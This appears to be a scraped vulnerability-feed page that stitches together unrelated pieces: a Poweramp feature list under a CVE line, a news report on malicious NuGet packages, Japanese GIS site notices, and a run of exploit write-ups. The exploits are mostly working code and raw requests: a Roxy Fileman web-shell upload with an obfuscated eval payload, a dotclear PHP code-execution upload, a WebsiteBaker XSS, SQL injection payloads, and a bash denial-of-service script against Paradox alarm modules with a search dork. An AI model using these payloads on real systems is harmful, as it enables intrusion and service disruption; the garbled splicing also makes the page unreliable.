An issue found in POWERAMP audioplayer build 925 bundle play and build 954 allows a remote attacker to gain privileges via the reverb and EQ preset parameters.

**Key Features**

*   Audio Engine
    *   plays mp3, mp4/m4a/alac/aac, ogg, opus, wma, flac, wav, ape, wv, tta, mpc, aiff, dsd (dff/dsf), mka, mpga, tak, flv (audio), and other formats
    *   optimized graphical equalizer: 5-32 bands, presets, custom and audio device assignable presets
    *   parametric equalizer: each band added and configured manually
        *   Low Pass/High Pass, Low Shelf/High Shelf, Band Pass, Peaking Band filters
    *   powerful Bass and Treble adjustment
    *   stereo expansion, mono mixing, balance
    *   tempo control, reverb effect
    *   Float32 internal sample format, Float64 DSP processing, up to 384 kHz sampling rate, selectable SWR/SoX resampler, multiple dither options, various per-output settings
    *   Hi-Res Output (where supported by the device)
    *   unique Direct Volume Control (DVC) for the extended dynamic range and deep bass
    *   crossfade
    *   gapless
    *   replay gain
    *   30/50/100+ volume levels (Android 5-11), SoundAssistant 150 levels support
    *   audio info with the detailed audio processing information
    *   AutoEQ .txt preset importing
*   User Interface
    *   visual themes, 3rd party skin support with the skin options as defined by skin Author
    *   spectrum and .milk compatible visualizations
    *   album art downloading, including high resolution album art formats; artist images downloading and per-category user-selectable images
    *   highly configurable widget types
    *   lock screen options
    *   sleep timer
*   Library and Folders
    *   plays songs from from own categorized Library or Folders (flat or hierarchy)
    *   optional dynamic Queue category
    *   advanced Shuffle and Repeat modes
        *   Shuffle Songs, Categories
        *   Shuffle Randomization options (Less random..Full Random)
    *   embed and standalone .CUE files support
    *   support for m3u, m3u8, pls, wpl playlists, m3u8 playlist exporting
    *   multiple Artists, Album Artists, Composers per track support
        *   with configurable split characters
    *   tag editor
*   Android Auto support
*   Google Assistant support
*   casting to Chromecast-enabled devices
*   http streaming via imported m3u8 or user created playlists
*   headset support, automatic Resume on headset and/or BT connection options
*   lyrics support, embedded lyrics and multiple 3rd party lyrics search apps supported
*   high level of customization via settings
*   open Poweramp API
*   works on any Android starting from 5+
*   settings/data export and import
*   constantly updated with the new features and support for the new Android versions
*   localized to 30 languages

**Download 15 days Trial:**

*   Google Play
*   This site (.apk)

**Try new beta releases:**

*   Poweramp new releases

CVE-2023-27645: Poweramp – Music Player for Android

Cybersecurity researchers have detailed the inner workings of the cryptocurrency stealer malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers.
The sophisticated typosquatting campaign, which was detailed by JFrog late last month, impersonated legitimate packages to execute PowerShell code designed to retrieve a follow-on binary

Software Security / Cryptocurrency

Cybersecurity researchers have detailed the inner workings of the cryptocurrency stealer malware that was distributed via 13 malicious NuGet packages as part of a supply chain attack targeting .NET developers.

The sophisticated typosquatting campaign, which was detailed by JFrog late last month, impersonated legitimate packages to execute PowerShell code designed to retrieve a follow-on binary from a hard-coded server.

The two-stage attack culminates in the deployment of a .NET-based persistent backdoor, called Impala Stealer, which is capable of gaining unauthorized access to users' cryptocurrency accounts.

"The payload used a very rare obfuscation technique, called '.NET AoT compilation,' which is a lot more stealthy than using 'off the shelf' obfuscators while still making the binary hard to reverse engineer," JFrog told The Hacker News in a statement.

.NET AoT compilation is an optimization technique that allows apps to be ahead-of-time compiled to native code. Native AOT apps also have faster startup time and smaller memory footprints, and can run on a machine without .NET runtime installed.

The second-stage payload comes with an auto-update mechanism that enables it to retrieve new versions of the executable from a remote location. It further achieves persistence by injecting JavaScript code into Discord or Microsoft Visual Studio Code apps, thereby activating the launch of the stealer binary.

The binary then proceeds to search for the installation of the Exodus Wallet desktop application and inserts JavaScript code into various HTML files in order to harvest and exfiltrate sensitive data to a hard-coded Discord webhook.

The JavaScript snippet, for its part, is fetched from an online paste website from where it's already been deleted. That said, it's suspected that the code may have been used to steal user credentials and access other information of interest.

"The bad actors used typosquatting techniques to deploy a custom malicious payload \[...\] which targets the Exodus crypto wallet and leaks the victim's credentials to cryptocurrency exchanges, by using code injection," Shachar Menashe, senior director at JFrog Security Research, said.

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

"Our investigation proves no open source software repository is completely trust-worthy, so safety measures should be taken at every step of the software development lifecycle to ensure the software supply chain remains secure."

The findings come as Phylum unearthed a malicious npm package named mathjs-min that was uploaded to the repository on March 26, 2023, and found to harbor a credential stealer that grabs Discord passwords from the official app as well as web browsers like Google Chrome, Brave, and Opera.

"This package is actually a modified version of the widely used Javascript math library mathjs, and was injected with malicious code after being forked," the software supply chain security firm said. "The modified version was then published to NPM with the intention of passing it off as a minified version of the genuine mathjs library."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

 Cryptocurrency Stealer Malware Distributed via 13 NuGet Packages

National land numerical information data conversion tool all versions improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the PC may be accessed by an attacker.

_stop_2023/04/10

国土数値情報・位置参照情報データ公開のお知らせ

令和４年度に作成・更新した下記のデータについて令和５年５月～６月にかけて公開いたします。  
（公開予定データ・順不同）  
土地利用３次メッシュ、土地利用細分メッシュ、都市地域土地利用細分メッシュ、土地利用詳細メッシュ（土地利用メッシュデータ公開範囲：北陸、関東、中部）  
行政区域、国・都道府県機関、市町村役場等及び公的集会施設、  
洪水浸水想定区域、土砂災害警戒区域、津波浸水想定、高潮浸水想定区域、雨水出水浸水想定区域、  
高速道路時系列、バス停留所、バスルート、鉄道、鉄道時系列、駅別乗降客数  
位置参照情報

_stop_2023/03/31

国土数値情報データ変換ツールの提供停止について

国土数値情報ダウンロードサイトにて提供してきた『国土数値情報データ変換ツール』に、  
XML外部エンティティ参照の不適切な制限の脆弱性(CWE-611)が判明したため提供を停止しました。  
過去に、当該ツールをダウンロードしているご利用者におかれましては、当該ツールの利用停止・削除を実施いただくようお願い申し上げます。  
詳しくはこちらをご覧ください。

_stop_2023/03/24

システムのメンテナンスに伴うホームページの運営について

2023年3月28日（火）14:00～16:30にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/11/28

システムのメンテナンスに伴うホームページの運営について

2022年12月1日（木）14:00～17:00、及び2022年12月2日（金）14:00～15:00にシステムのメンテナンスを行います。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/9/14

ビジネスアイデアコンテスト『イチBizアワード』開催

内閣官房主催「地理空間情報」を活用したビジネスアイデアコンテスト『イチBizアワード』の公募が、2022年7月19日より開始しており、2022年9月30日（金）18:00まで受付中とのことです。本コンテストについて内閣官房よりメッセージが届いておりますので紹介いたします。  
なお、応募方法や詳細については、公式サイトをご覧ください。  
https://www.g-idea.go.jp/

（内閣官房のメッセージ）  
内閣官房では地理空間情報のポテンシャルを最大限活かした新しいサービスビジネスが生まれ、発展することで、よりよい社会や生活を実現し未来を切り開きたい、という思いで『イチBizアワード』を企画いたしました。  
『イチBizアワード』では、「いつ、どこで、何が、どのような状態か」といった、位置や時間に関する情報を活用したものであれば、どんなアイデアでも自由にご応募いただけます。  
既にあるビジネスアイデアやこんなサービスがあったらいいなという、ちょっとしたアイデアまで、沢山のアイデアの応募をお待ちしています。  
応募いただいたアイデアは、専門知識や発信力をもつ審査員に審査いただき、「事業化部門」「マッチング部門」「ちょっとしたサービスアイデア部門」の３つの部門で表彰します。  
加えて協賛企業とのマッチングの機会もあり、実現に向けて後押しします。 奮ってのご応募をお待ちしております。

_stop_2022/8/9

システムのメンテナンスに伴うホームページの運営について

2022年8月17日（水）14:00～17:00にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的にできなくなることがあります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いいたします。

_stop_2022/07/05

システムのメンテナンスに伴うホームページの運営について

2022年7月7日（木）13:00～15:30、及び2022年7月8日（金）15:30～16:30にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的にできなくなることがあります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いいたします。

_stop_2022/06/06

システムのメンテナンスに伴うホームページの運営について

2022年6月9日（木）16:00～17:30にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的にできなくなることがあります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いいたします。

_stop_2022/03/28

システムのメンテナンスに伴うホームページの運営について

2022年3月30日（水）17:00～18:00にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/03/24

利用者アンケートを開設しました

当サイトへの感想やご意見を募集するアンケートを開設しました。画面左メニューの「利用者アンケート」からご回答いただけます。  
ご回答いただました内容は今後のサイト運営に役立てて参りますので、是非ご協力の程よろしくお願いいたします。

_stop_2022/03/23

システムのメンテナンスに伴うホームページの運営について

2022年3月25日（金）18:00～18:10にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/02/22

位置参照情報ページについて

本日14:00頃、位置参照情報ページが復旧いたしました。  
利用者の皆さまには大変ご迷惑をおかけしました。今後ともよろしくお願いします。

_stop_2022/02/19

システムのメンテナンスに伴うホームページの運営について

GISホームページは、現在、メンテナンス中でホームページに断続的にアクセスができなくなることがあります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/02/18

システムのメンテナンスに伴うホームページの運営について

2022年2月24日（木）15:00～15:10にシステムのメンテナンスを行います。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2022/02/14

システムのメンテナンスに伴うホームページの運営について

2022年2月18日（金）18:30～19:30にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2021/11/10

システムのメンテナンスに伴うホームページの運営について

2021年11月13日（土）9:00～10:00にシステムのメンテナンスを行います（進捗状況により延長する可能性があります。）。  
そのため、メンテナンス中は、GISホームページへのアクセスが断続的に出来なくなります。  
利用者の皆さまには大変ご迷惑をおかけしますがよろしくお願いします。

_stop_2021/01/12

システムのメンテナンスに伴うホームページの運営について

2021年1月15日（金）にシステムのメンテナンスを行います。  
それに伴い、よりセキュリティが強固な設定となり、セキュリティが弱い暗号化を使用しているブラウザからは接続できなくなります。  
閲覧できない場合は、現在ご利用のMicrosoft Edge、Mozilla Firefox、Google Chromeが最新のバージョンかご確認いただき、最新のバージョンへアップデートをお願いいたします。

_stop_2020/12/12

三大都市圏計画区域データ PDF･KMLダウンロードページ開設のお知らせ

こちらに 国土数値情報 三大都市圏計画区域 データから作成した、PDF･KMLファイルのダウンロードページを開設しました。

_stop_2020/07/07

ウェブマッピング調整中のお知らせ　（対応完了しました）

ウェブマッピングシステムは、現在データセットを準備中です。準備ができ次第、順次公開いたします。  
国土数値情報データの内容を確認するには、GISをご利用になるか、geojson形式のファイルをご利用ください。

_stop_2020/07/01

GISホームページ業務移管のお知らせ

令和２年度の国土交通省の組織改編に伴い7月1日よりGISホームページは以下の局に移管となります。  
国土数値情報・位置参照情報　不動産・建設経済局  
国土調査（土地分類調査・水調査）　国土政策局

_stop_2020/06/30

国土数値情報閲覧マニュアル公開のお知らせ

国土数値情報閲覧マニュアル（QGIS）、Geojsonデータ閲覧マニュアルの公開を開始いたしました。  
こちらからダウンロードの上、ご活用ください。  
（現在、ウェブマッピングシステムは調整中になっております。国土数値情報データの内容確認にはこちらのマニュアルをご活用ください。）

_stop_2020/05/18

【重要】GISホームページのリニューアルのお知らせ

2020/05/18よりGISホームページをリニューアルしました。  
なお、一部のデータについては、今後今月末を目処に順次登録して参りますので、データが登録されるまで今しばらくお待ち願います。

（2020/05/22追記）  
GISホームページで対応するブラウザは以下のとおりです。  
対応ブラウザ以外をご利用された場合、画面が正しく表示されない場合がございます。  
Microsoft Edge （最新版）、Mozilla Firefox （最新版）、Google Chrome （最新版）  
ご不明な点などがございましたら、以下の問い合わせ窓口までご連絡願います。  
国土数値情報問合せ受付け窓口　：shitsumon@ksjask.info

CVE-2023-25955: お知らせ

Roxy Fileman versions 1.4.5 and below for .NET suffer from a remote shell upload vulnerability.

    # Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload# Date: 09/04/2023# Exploit Author: Zer0FauLT [admindeepsec@proton.me]# Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net# Version: <= 1.4.5# Tested on: Windows 10 and Windows Server 2019# CVE : 0DAY###########################################################################################                First, we upload the .jpg shell file to the server.                     ###########################################################################################POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 666Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="action"upload------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="method"ajax------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="d"/Upload/PenTest------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="files[]"; filename="test.jpg"Content-Type: image/jpegâ€°PNG<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>------WebKitFormBoundarygOxjsc2hpmwmISeJ--###########################################################################################   In the second stage, we manipulate the .jpg file that we uploaded to the server.     ###########################################################################################{"FILES_ROOT":          "","RETURN_URL_PREFIX":   "","SESSION_PATH_KEY":    "","THUMBS_VIEW_WIDTH":   "140","THUMBS_VIEW_HEIGHT":  "120","PREVIEW_THUMB_WIDTH": "300","PREVIEW_THUMB_HEIGHT":"200","MAX_IMAGE_WIDTH":     "1000","MAX_IMAGE_HEIGHT":    "1000","INTEGRATION":         "ckeditor","DIRLIST":             "asp_net/main.ashx?a=DIRLIST","CREATEDIR":           "asp_net/main.ashx?a=CREATEDIR","DELETEDIR":           "asp_net/main.ashx?a=DELETEDIR","MOVEDIR":             "asp_net/main.ashx?a=MOVEDIR","COPYDIR":             "asp_net/main.ashx?a=COPYDIR","RENAMEDIR":           "asp_net/main.ashx?a=RENAMEDIR","FILESLIST":           "asp_net/main.ashx?a=FILESLIST","UPLOAD":              "asp_net/main.ashx?a=UPLOAD","DOWNLOAD":            "asp_net/main.ashx?a=DOWNLOAD","DOWNLOADDIR":         "asp_net/main.ashx?a=DOWNLOADDIR","DELETEFILE":          "asp_net/main.ashx?a=DELETEFILE","MOVEFILE":            "asp_net/main.ashx?a=MOVEFILE","COPYFILE":            "asp_net/main.ashx?a=COPYFILE","RENAMEFILE":          "asp_net/main.ashx?a=RENAMEFILE","GENERATETHUMB":       "asp_net/main.ashx?a=GENERATETHUMB","DEFAULTVIEW":         "list","FORBIDDEN_UPLOADS":   "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess","ALLOWED_UPLOADS":     "bmp gif png jpg jpeg","FILEPERMISSIONS":     "0644","DIRPERMISSIONS":      "0755","LANG":                "auto","DATEFORMAT":          "dd/MM/yyyy HH:mm","OPEN_LAST_DIR":       "yes"}#############################################################################################################################################################################################################################   We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows.     #############################################################################################################################################################################################################################POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 44Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx===========================================================================================================================================================================================================================POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 68Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx###########################################################################################                                 and it's done!                                         ###########################################################################################HTTP/2 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By-Plesk: PleskWinDate: Sun, 09 Apr 2023 09:49:34 GMTContent-Length: 21{"res":"ok","msg":""}=============================================================================================

Roxy Fileman 1.4.5 Shell Upload

Chrome suffers from a heap buffer overflow vulnerability in base::SampleVectorBase::MoveSingleSampleToCounts.

Chrome base::SampleVectorBase::MoveSingleSampleToCounts Heap Buffer Overflow

Chrome suffers from a heap buffer overflow vulnerability in base::debug::ActivityUserData::ActivityUserData.

Chrome base::debug::ActivityUserData::ActivityUserData Heap Buffer Overflow

WebsiteBaker version 2.13.3 suffers from a cross site scripting vulnerability.

    Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)Application: WebsiteBakerVersion: 2.13.3Bugs:  Stored XSSTechnology: PHPVendor URL: https://websitebaker.org/pages/en/home.phpSoftware Link: https://wiki.websitebaker.org/doku.php/en/downloadsDate of found: 02.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the page can do thispayload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3EPOST /admin/pages/add.php HTTP/1.1Host: localhostContent-Length: 137Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9Connection: closeb7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add2. Visit http://localhost/

WebsiteBaker 2.13.3 Cross Site Scripting

dotclear version 2.25.3 suffers from a remote shell upload vulnerability.

    Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)Application: dotclearVersion: 2.25.3Bugs:  Remote Code Execution (RCE) (Authenticated) via file uploadTechnology: PHPVendor URL: https://dotclear.org/Software Link: https://dotclear.org/downloadDate of found: 08.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================While writing a blog post, we know that we can upload images. But php did not allow file upload. This time<?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it.We were able to run the php code when we visited your pagepoc request:POST /dotclear/admin/post.php HTTP/1.1Host: localhostContent-Length: 566Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1ccConnection: closepost_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=poc video : https://youtu.be/oIPyLqLJS70

dotclear 2.25.3 Shell Upload

Paradox Security Systems version IPR512 suffers from a denial of service vulnerability.

#!/bin/bash

# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service  
# Google Dork: intitle:"ipr512 * - login screen"  
# Date: 09-APR-2023  
# Exploit Author: Giorgi Dograshvili  
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)  
# Version: IPR512  
# CVE : CVE-2023-24709

# Function to display banner message  
display_banner() {  
  echo "******************************************************"  
  echo "*                                                    *"  
  echo "*                PoC CVE-2023-24709                  *"  
  echo "*      BE AWARE!!! RUNNING THE SCRIPT WILL MAKE      *"  
  echo "*    A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!   *"  
  echo "*                                by SlashXzerozero   *"  
  echo "*                                                    *"  
  echo "******************************************************"  
}

# Call the function to display the banner  
display_banner  
  echo ""  
  echo ""  
  echo "Please enter a domain name or IP address with or without port"  
read -p  "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

# Step 2: Ask for user confirmation  
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm  
if [[ $confirm == "Y" || $confirm == "y" ]]; then  
  # Display loading animation  
  animation=("|" "/" "-" "\\")  
  index=0  
  while [[ $index -lt 10 ]]; do  
    echo -ne "Loading ${animation[index]} \r"  
    sleep 1  
    index=$((index + 1))  
  done

  # Use curl to send HTTP GET request with custom headers and timeout  
  response=$(curl -i -s -k -X GET \  
    -H "Host: $domain" \  
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \  
    -H "Accept: */" \  
    -H "Referer: http://$domain/login.html" \  
    -H "Accept-Encoding: gzip, deflate" \  
    -H "Accept-Language: en-US,en;q=0.9" \  
    -H "Connection: close" \  
    --max-time 10 \  
    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

  # Check response for HTTP status code 200 and print result  
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then  
    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"  
  else  
    echo -e "\nShouldn't be vulnerable! Please check the webpanel:  http://$domain/login.html"  
  fi  
else  
  echo "The script is stopped!."  
fi

Paradox Security Systems IPR512 Denial Of Service

A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file /admin/inventory/manage_stock.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-225406 is the identifier assigned to this vulnerability.

**Online Eyewear Shop v1.0 has SQL injection**

BUG\_Author:Gear-D

Website source address:https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html

Vulnerability File: /oews/admin/inventory/manage\_stock.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and (select 1 from(select count(\*),concat(0x61626364,(select (elt(999=999,1))),0x75767778,floor(rand(0)\*2))x from information\_schema.plugins group by x)a)-- a

    GET /oews/admin/inventory/manage_stock.php?id=1%27%20and%20(select%201%20from(select%20count(*),concat(0x61626364,(select%20(elt(999=999,1))),0x75767778,floor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a)--%20a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=k7m8rkajvoev3rcu6g7qup0660
    Connection: close
    

Injection success based on errors

Payload2:id=1' and (select 1 from (select(sleep(5)))a)-- a

    GET /oews/admin/inventory/manage_stock.php?id=1%27%20and%20(select%201%20from%20(select(sleep(5)))a)--%20a HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
